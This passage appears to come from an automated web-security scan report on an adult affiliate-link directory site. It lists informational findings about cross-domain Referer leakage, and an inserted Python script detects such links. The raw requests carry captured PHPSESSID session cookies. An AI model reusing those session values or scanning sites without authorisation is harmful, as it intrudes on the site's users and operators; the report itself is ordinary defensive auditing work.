Host: http://www.resellerbase.com
Path: /adult/media-chat/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /adult/media-chat/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:30:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.13. http://www.resellerbase.com/adult/media-chat/themes/search.php

Summary

Severity: Information
Confidence: Certain
Host: http://www.resellerbase.com
Path: /adult/media-chat/themes/search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /adult/media-chat/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:30:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.14. http://www.resellerbase.com/adult/personals-dating/

Summary

Severity: Information
Confidence: Certain
Host: http://www.resellerbase.com
Path: /adult/personals-dating/

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /adult/personals-dating/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.15. http://www.resellerbase.com/adult/personals-dating/googlepr.php

Summary

Severity: Information
Confidence: Certain
Host: http://www.resellerbase.com
Path: /adult/personals-dating/googlepr.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /adult/personals-dating/googlepr.php?link_id=14 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.16. http://www.resellerbase.com/adult/personals-dating/search.php

Summary

Severity: Information
Confidence: Certain
Host: http://www.resellerbase.com
Path: /adult/personals-dating/search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /adult/personals-dating/search.php?cat=13&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:32:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 40799

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.datingrev.com/cgi/go.cgi?where=0815" name="link_14"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.datingrev.com/cgi/go.cgi?where=0815" name="link_14"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.worlddatingpartners.com/index.do?refId=RSLLR-6425" name="link_18"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.worlddatingpartners.com/index.do?refId=RSLLR-6425" name="link_18"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.dating-central.com/corporate/register/signup.asp?RID=655&ReferrerID=23939" name="link_19"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.dating-central.com/corporate/register/signup.asp?RID=655&ReferrerID=23939" name="link_19"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.loveme.com/go/49557" name="link_22"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.loveme.com/go/49557" name="link_22"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.sitesinstantly.com/?bid=3617" name="link_26"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.sitesinstantly.com/?bid=3617" name="link_26"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://af.NudistFriends.com/i/af6025460" name="link_41"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://af.NudistFriends.com/i/af6025460" name="link_41"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.17. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/search.php

Summary

Severity: Information
Confidence: Certain
Host: http://www.resellerbase.com
Path: /adult/personals-dating/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /adult/personals-dating/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.18. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/search.php

Summary

Severity: Information
Confidence: Certain
Host: http://www.resellerbase.com
Path: /adult/personals-dating/themes/kosmos/images/review/search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /adult/personals-dating/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.19. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/search.php

Summary

Severity: Information
Confidence: Certain
Host: http://www.resellerbase.com
Path: /adult/personals-dating/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /adult/personals-dating/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.20. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/search.php

Summary

Severity: Information
Confidence: Certain
Host: http://www.resellerbase.com
Path: /adult/personals-dating/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /adult/personals-dating/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.21. http://www.resellerbase.com/adult/personals-dating/themes/search.php

Summary

Severity: Information
Confidence: Certain
Host: http://www.resellerbase.com
Path: /adult/personals-dating/themes/search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /adult/personals-dating/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.22. http://www.resellerbase.com/adult/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/search.php

Issue detail

The page was loaded from a URL containing a query string (cat=7&keyword=search...&Submit3=Search&opt=1, see the request below). The response contains links to other domains: the affiliate links shown in the response excerpt and the validator.w3.org and jigsaw.w3.org badges in the footer. Following any of them sends the full page URL, query string included, to that domain in the Referer header. The query string here holds only search parameters, no session or user data, which is why the severity is Information.

Request

GET /adult/search.php?cat=7&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:34:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 56382

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.datingrev.com/cgi/go.cgi?where=0815" name="link_14"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.datingrev.com/cgi/go.cgi?where=0815" name="link_14"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.worlddatingpartners.com/index.do?refId=RSLLR-6425" name="link_18"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.worlddatingpartners.com/index.do?refId=RSLLR-6425" name="link_18"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.dating-central.com/corporate/register/signup.asp?RID=655&ReferrerID=23939" name="link_19"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.dating-central.com/corporate/register/signup.asp?RID=655&ReferrerID=23939" name="link_19"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.spacash.com/?account=resellerbase&fee=flat" name="link_30"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.spacash.com/?account=resellerbase&fee=flat" name="link_30"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.loveme.com/go/49557" name="link_22"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.loveme.com/go/49557" name="link_22"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.camsense.com/link.html?ref=1399934" name="link_31"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.camsense.com/link.html?ref=1399934" name="link_31"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.6-chats.com/ELT" name="link_32"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.6-chats.com/ELT" name="link_32"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.love-money.de/?id=26660" name="link_33"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.love-money.de/?id=26660" name="link_33"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.vod-cash.com/?id=26660" name="link_34"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.vod-cash.com/?id=26660" name="link_34"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.awempire.com/ws/referral_rs=reseller/wsmain2.php" name="link_35"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.awempire.com/ws/referral_rs=reseller/wsmain2.php" name="link_35"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...
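The check these findings apply, written out as a small script. This is an added example, not part of the scan report or of the scanner that produced it: given the URL a page was loaded from and its HTML body, it collects link targets, resolves relative ones, and returns the targets whose host differs from the page's host, together with the query string a browser would send in the Referer header when following them. The sample HTML is constructed to mirror the shape of the 6.22 response excerpt; the function and constant names are assumptions of this example.

```python
"""Cross-domain Referer leakage check (added example, not from the scan report)."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _LinkCollector(HTMLParser):
    """Collect outbound targets from the tags that make a browser fetch or navigate."""

    ATTRS = {"a": "href", "link": "href", "img": "src", "script": "src",
             "iframe": "src", "form": "action"}

    def __init__(self):
        super().__init__()
        self.targets = []

    def handle_starttag(self, tag, attrs):
        want = self.ATTRS.get(tag)
        if want is None:
            return
        for name, value in attrs:
            if name == want and value:
                self.targets.append(value)


def cross_domain_links(page_url, html):
    """Distinct absolute http(s) URLs in `html` whose host differs from `page_url`'s host.

    Relative targets are resolved against page_url; mailto:, javascript: and
    fragment-only targets are ignored because they carry no Referer anywhere.
    """
    page_host = urlsplit(page_url).hostname.lower()
    parser = _LinkCollector()
    parser.feed(html)
    found = set()
    for target in parser.targets:
        parts = urlsplit(urljoin(page_url, target))
        if parts.scheme not in ("http", "https") or not parts.hostname:
            continue
        if parts.hostname.lower() != page_host:
            found.add(parts.geturl())
    return sorted(found)


def referer_leakage(page_url, html):
    """Classify a page the way the report does.

    Returns (query_string, links): query_string is '' when the loading URL had
    none (then there is nothing to leak), links are the cross-domain targets
    that would receive the page URL in the Referer header.
    """
    query = urlsplit(page_url).query
    return query, cross_domain_links(page_url, html)


# Constructed sample, shaped like the 6.22 response excerpt above (assumption).
SAMPLE_URL = ("http://www.resellerbase.com/adult/search.php"
              "?cat=7&keyword=search...&Submit3=Search&opt=1")
SAMPLE_HTML = """
<a href="http://www.datingrev.com/cgi/go.cgi?where=0815" name="link_14"><b>x</b></a>
<a href="http://www.datingrev.com/cgi/go.cgi?where=0815" name="link_14"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" /></a>
<a href="/detail/38/whitelabelcash-com.html">same host, relative</a>
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" /></a>
<a href="http://jigsaw.w3.org/css-validator/check/referer">css</a>
<a href="mailto:abuse@example.invalid">mail</a>
"""

if __name__ == "__main__":
    query, links = referer_leakage(SAMPLE_URL, SAMPLE_HTML)
    print("query string that would leak:", query or "(none)")
    for link in links:
        print("  ->", link)
```

Run over a real capture, the interesting part is not the list of domains but the query string: a search term is harmless, a reset token or an account number is not. Same-host links and the site's own images are filtered out, since they receive the Referer anyway, and the duplicate affiliate link collapses to one entry.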

6.23. http://www.resellerbase.com/adult/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/search.php

Issue detail

The page was loaded from a URL containing a query string (cat, keyword, Submit3, opt and a double-URL-encoded select value, see the request below). The response contains links to other domains: the affiliate links shown in the response excerpt and the validator.w3.org and jigsaw.w3.org badges in the footer. Following any of them sends the full page URL, query string included, to that domain in the Referer header. The parameters here are search and navigation state, not session or user data.

Request

GET /adult/search.php?cat=7&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/search.php?cat=7&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:34:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 56078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.6-chats.com/ELT" name="link_32"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.6-chats.com/ELT" name="link_32"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.awempire.com/ws/referral_rs=reseller/wsmain2.php" name="link_35"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.awempire.com/ws/referral_rs=reseller/wsmain2.php" name="link_35"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.camsense.com/link.html?ref=1399934" name="link_31"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.camsense.com/link.html?ref=1399934" name="link_31"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.dating-central.com/corporate/register/signup.asp?RID=655&ReferrerID=23939" name="link_19"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.dating-central.com/corporate/register/signup.asp?RID=655&ReferrerID=23939" name="link_19"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.datingrev.com/cgi/go.cgi?where=0815" name="link_14"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.datingrev.com/cgi/go.cgi?where=0815" name="link_14"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.love-money.de/?id=26660" name="link_33"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.love-money.de/?id=26660" name="link_33"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.loveme.com/go/49557" name="link_22"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.loveme.com/go/49557" name="link_22"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.nemproduction.com/?id=26660" name="link_36"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.nemproduction.com/?id=26660" name="link_36"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.neondollars.com/track/harrye:wmref:neondollars/" name="link_37"><b style="color: #E78502">
...[SNIP]...
<br />
